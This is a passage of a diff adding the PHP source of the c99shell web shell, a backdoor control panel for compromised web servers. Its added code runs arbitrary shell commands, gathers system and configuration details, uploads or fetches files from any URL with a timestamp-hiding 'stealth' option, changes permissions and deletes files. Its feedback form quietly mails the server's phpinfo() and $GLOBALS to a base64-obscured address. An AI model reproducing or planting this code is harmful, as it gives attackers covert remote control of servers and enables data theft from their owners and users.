+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} 
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}} 
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version")); 
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); 
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); 
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); 
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); 
+ displaysecinfo("RAM",myshellexec("free -m")); 
+ displaysecinfo("HDD space",myshellexec("df -h")); 
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a")); 
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); 
+ displaysecinfo("Is cURL installed?",myshellexec("which curl")); 
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx")); 
+ displaysecinfo("Is links installed?",myshellexec("which links")); 
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch")); 
+ displaysecinfo("Is GET installed?",myshellexec("which GET")); 
+ displaysecinfo("Is perl installed?",myshellexec("which perl")); 
+ displaysecinfo("Where is apache",myshellexec("whereis apache")); 
+ displaysecinfo("Where is perl?",myshellexec("whereis perl")); 
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); 
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); 
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf")); 
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); 
+} 
+if ($act == "mkfile") 
+{ 
+ if ($mkfile != $d) 
+ { 
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} 
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} 
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} 
+ } 
+ else {$act = $dspact = "ls";} 
+} 
+if ($act == "encoder") 
+{ 
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; 
+ foreach(array("md5","crypt","sha1","crc32") as $v) 
+ { 
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; 
+ } 
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> 
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> 
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; 
+ echo "<center>base64_decode - "; 
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} 
+ else 
+ { 
+  $debase64 = base64_decode($encoder_input); 
+  $debase64 = str_replace("\0","[0]",$debase64); 
+  $a = explode("\r\n",$debase64); 
+  $rows = count($a); 
+  $debase64 = htmlspecialchars($debase64); 
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} 
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} 
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>"; 
+ } 
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; 
+ $c = strlen($encoder_input); 
+ for($i=0;$i<$c;$i++) 
+ { 
+  $hex = dechex(ord($encoder_input[$i])); 
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} 
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} 
+ } 
+ echo "\" readonly><br></center></form>"; 
+} 
+if ($act == "fsbuff") 
+{ 
+ $arr_copy = $sess_data["copy"]; 
+ $arr_cut = $sess_data["cut"]; 
+ $arr = array_merge($arr_copy,$arr_cut); 
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} 
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} 
+} 
+if ($act == "selfremove") 
+{ 
+ if (($submit == $rndcode) and ($submit != "")) 
+ { 
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } 
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} 
+ } 
+ else 
+ { 
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} 
+  $rnd = rand(0,9).rand(0,9).rand(0,9); 
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; 
+ } 
+} 
+if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}} 
+if ($act == "feedback") 
+{ 
+ $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); 
+ if (!empty($submit)) 
+ { 
+  $ticket = substr(md5(microtime()+rand(1,1000)),0,6); 
+  $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; 
+  if (!empty($fdbk_ref)) 
+  { 
+   $tmp = @ob_get_contents(); 
+   ob_clean(); 
+   phpinfo(); 
+   $phpinfo = base64_encode(ob_get_contents()); 
+   ob_clean(); 
+   echo $tmp; 
+   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; 
+  } 
+  mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); 
+  echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>"; 
+ } 
+ else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} 
+} 
+if ($act == "search") 
+{ 
+ echo "<b>Search in file-system:</b><br>"; 
+ if (empty($search_in)) {$search_in = $d;} 
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} 
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;} 
+ if (!empty($submit)) 
+ { 
+  $found = array(); 
+  $found_d = 0; 
+  $found_f = 0; 
+  $search_i_f = 0; 
+  $search_i_d = 0; 
+  $a = array 
+  ( 
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp, 
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp, 
+   "text_wwo"=>$search_text_wwo, 
+   "text_cs"=>$search_text_cs, 
+   "text_not"=>$search_text_not 
+  ); 
+  $searchtime = getmicrotime(); 
+  $in = array_unique(explode(";",$search_in)); 
+  foreach($in as $v) {c99fsearch($v);} 
+  $searchtime = round(getmicrotime()-$searchtime,4); 
+  if (count($found) == 0) {echo "<b>No files found!</b>";} 
+  else 
+  { 
+   $ls_arr = $found; 
+   $disp_fullpath = TRUE; 
+   $act = "ls"; 
+  } 
+ } 
+ echo "<form method=POST> 
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> 
+<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp 
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> 
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> 
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text 
+<br><br><input type=submit name=submit value=\"Search\"></form>"; 
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} 
+} 
+if ($act == "chmod") 
+{ 
+ $mode = fileperms($d.$f); 
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} 
+ else 
+ { 
+  $form = TRUE; 
+  if ($chmod_submit) 
+  { 
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); 
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} 
+   else {$err = "Can't chmod to ".$octet.".";} 
+  } 
+  if ($form) 
+  { 
+   $perms = parse_perms($mode); 
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; 
+  } 
+ } 
+} 
+if ($act == "upload") 
+{ 
+ $uploadmess = ""; 
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); 
+ if (empty($uploadpath)) {$uploadpath = $d;} 
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} 
+ if (!empty($submit)) 
+ { 
+  global $HTTP_POST_FILES; 
+  $uploadfile = $HTTP_POST_FILES["uploadfile"]; 
+  if (!empty($uploadfile["tmp_name"])) 
+  { 
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];} 
+   else {$destin = $userfilename;} 
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} 
+  } 
+  elseif (!empty($uploadurl)) 
+  { 
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;} 
+   else 
+   { 
+    $destin = explode("/",$destin); 
+    $destin = $destin[count($destin)-1]; 
+    if (empty($destin)) 
+    { 
+     $i = 0; 
+     $b = ""; 
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} 
+   } 
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} 
+   else 
+   { 
+    $st = getmicrotime(); 
+    $content = @file_get_contents($uploadurl); 
+    $dt = round(getmicrotime()-$st,4); 
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";} 
+    else 
+    { 
+     if ($filestealth) {$stat = stat($uploadpath.$destin);} 
+     $fp = fopen($uploadpath.$destin,"w"); 
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} 
+     else 
+     { 
+      fwrite($fp,$content,strlen($content)); 
+      fclose($fp); 
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} 
+     } 
+    } 
+   } 
+  } 
+ } 
+ if ($miniform) 
+ { 
+  echo "<b>".$uploadmess."</b>"; 
+  $act = "ls"; 
+ } 
+ else 
+ { 
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> 
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> 
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> 
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> 
+File-name (auto-fill): <input name=uploadfilename size=25><br><br> 
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> 
+<input type=submit name=submit value=\"Upload\"> 
+</form>"; 
+ } 
+} 
+if ($act == "delete") 
+{ 
+ $delerr = ""; 
+ foreach ($actbox as $v) 
+ { 
+  $result = FALSE; 
+  $result = fs_rmobj($v); 
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} 
+ } 
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} 
+ $act = "ls"; 
+} 
+if (!$usefsbuff) 
+{ 
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} 
+} 
+else 
+{ 
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } 
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} 
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} 
+ elseif ($actpastebuff) 
+ { 
+  $psterr = ""; 
+  foreach($sess_data["copy"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
+   if ($copy_unset) {unset($sess_data["copy"][$k]);} 
+  } 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
+  $act = "ls"; 
+ } 
+ elseif ($actarcbuff) 
+ { 
+  $arcerr = ""; 
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} 
+  else {$ext = ".tar.gz";} 
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} 
+  $cmdline .= " ".$actarcbuff_path; 
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]); 
+  foreach($objects as $v) 
+  { 
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); 
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} 
+   if (is_dir($v)) 
+   { 
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} 
+    $v .= "*"; 
+   } 
+   $cmdline .= " ".$v; 
+  } 
+  $tmp = realpath("."); 
+  chdir($d); 
+  $ret = myshellexec($cmdline); 
+  chdir($tmp); 
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} 
+  $ret = str_replace("\r\n","\n",$ret); 
+  $ret = explode("\n",$ret); 
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   if (in_array($v,$ret)) {fs_rmobj($v);} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} 
+  $act = "ls"; 
+ } 
+ elseif ($actpastebuff) 
+ { 
+  $psterr = ""; 
+  foreach($sess_data["copy"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
+   if ($copy_unset) {unset($sess_data["copy"][$k]);} 
+  } 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
+  $act = "ls"; 
+ } 
+} 
+if ($act == "cmd") 
+{ 
+if (trim($cmd) == "ps -aux") {$act = "processes";} 
+elseif (trim($cmd) == "tasklist") {$act = "processes";} 
+else 
+{ 
+ @chdir($chdir); 
+ if (!empty($submit)) 
+ { 
+  echo "<b>Result of execution this command</b>:<br>"; 
+  $olddir = realpath("."); 
+  @chdir($d); 
+  $ret = myshellexec($cmd); 
+  $ret = convert_cyr_string($ret,"d","w"); 
+  if ($cmd_txt) 
+  { 
+   $rows = count(explode("\r\n",$ret))+1; 
+   if ($rows < 10) {$rows = 10;} 
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
+  } 
+  else {echo $ret."<br>";} 
+  @chdir($olddir); 
+ } 
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} 
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; 
+} 
+} 
+if ($act == "ls") 
+{ 
+ if (count($ls_arr) > 0) {$list = $ls_arr;} 
+ else 
+ { 
+  $list = array(); 
+  if ($h = @opendir($d)) 
+  { 
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} 
+   closedir($h); 
+  } 
+  else {} 
+ } 
+ if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} 
+ else 
+ { 
+  //Building array 
+  $objects = array(); 
+  $vd = "f"; //Viewing mode 
+  if ($vd == "f") 
+  { 
+   $objects["head"] = array(); 
+   $objects["folders"] = array(); 
+   $objects["links"] = array(); 
+   $objects["files"] = array(); 
+   foreach ($list as $v) 
+   { 
+    $o = basename($v); 
+    $row = array(); 
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} 
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} 
+    elseif (is_dir($v)) 
+    { 
+     if (is_link($v)) {$type = "LINK";} 
+     else {$type = "DIR";} 
+     $row[] = $v; 
+     $row[] = $type; 
+    } 
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} 
+    $row[] = filemtime($v); 
+    if (!$win) 
+    { 
+     $ow = posix_getpwuid(fileowner($v)); 
+     $gr = posix_getgrgid(filegroup($v)); 
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); 
+    } 
+    $row[] = fileperms($v); 
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} 
+    elseif (is_link($v)) {$objects["links"][] = $row;} 
+    elseif (is_dir($v)) {$objects["folders"][] = $row;} 
+    elseif (is_file($v)) {$objects["files"][] = $row;} 
+    $i++; 
+   } 
+   $row = array(); 
+   $row[] = "<b>Name</b>"; 
+   $row[] = "<b>Size</b>"; 
+   $row[] = "<b>Modify</b>"; 
+   if (!$win) 
+  {$row[] = "<b>Owner/Group</b>";} 
+   $row[] = "<b>Perms</b>"; 
+   $row[] = "<b>Action</b>"; 
+   $parsesort = parsesort($sort); 
+   $sort = $parsesort[0].$parsesort[1]; 
+   $k = $parsesort[0]; 
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";} 
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; 
+   $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; 
+   $row[$k] .= $y; 
+   for($i=0;$i<count($row)-1;$i++) 
+   { 
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} 
+   } 
+   $v = $parsesort[0]; 
+   usort($objects["folders"], "tabsort"); 
+   usort($objects["links"], "tabsort"); 
+   usort($objects["files"], "tabsort"); 
+   if ($parsesort[1] == "d") 
+   { 
+    $objects["folders"] = array_reverse($objects["folders"]); 
+    $objects["files"] = array_reverse($objects["files"]); 
+   } 
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); 
+   $tab = array(); 
+   $tab["cols"] = array($row); 
+   $tab["head"] = array(); 
+   $tab["folders"] = array(); 
+   $tab["links"] = array(); 
+   $tab["files"] = array(); 
+   $i = 0; 
+   foreach ($objects as $a) 
+   { 
+    $v = $a[0]; 
+    $o = basename($v); 
+    $dir = dirname($v); 
+    if ($disp_fullpath) {$disppath = $v;} 
+    else {$disppath = $o;} 
+    $disppath = str2mini($disppath,60); 
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} 
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} 
+    foreach ($regxp_highlight as $r) 
+    { 
+     if (ereg($r[0],$o)) 
+     { 
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} 
+      else 
+      { 
+       $r[1] = round($r[1]); 
+       $isdir = is_dir($v); 
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) 
+       { 
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} 
+        $disppath = $r[2].$disppath.$r[3]; 
+        if ($r[4]) {break;} 
+       } 
+      } 
+     } 
+    } 
+    $uo = urlencode($o); 
+    $ud = urlencode($dir); 
+    $uv = urlencode($v); 
+    $row = array(); 
+    if ($o == ".") 
+    { 
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
+     $row[] = "LINK"; 
+    } 
+    elseif ($o == "..") 
+    { 
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
+     $row[] = "LINK"; 
+    } 
+    elseif (is_dir($v)) 
+    { 
+     if (is_link($v)) 
+     { 
+      $disppath .= " => ".readlink($v); 
+      $type = "LINK"; 
+      $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
+     } 
+     else 
+     { 
+      $type = "DIR"; 
+      $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
+      } 
+     $row[] = $type; 
+    } 
+    elseif(is_file($v)) 
+    { 
+     $ext = explode(".",$o); 
+     $c = count($ext)-1; 
+     $ext = $ext[$c]; 
+     $ext = strtolower($ext); 
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; 
+     $row[] = view_size($a[1]); 
+    } 
+    $row[] = date("d.m.Y H:i:s",$a[2]); 
+    if (!$win) {$row[] = $a[3];} 
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; 
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} 
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} 
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;} 
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;} 
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} 
+    elseif (is_link($v)) {$tab["links"][] = $row;} 
+    elseif (is_dir($v)) {$tab["folders"][] = $row;} 
+    elseif (is_file($v)) {$tab["files"][] = $row;} 
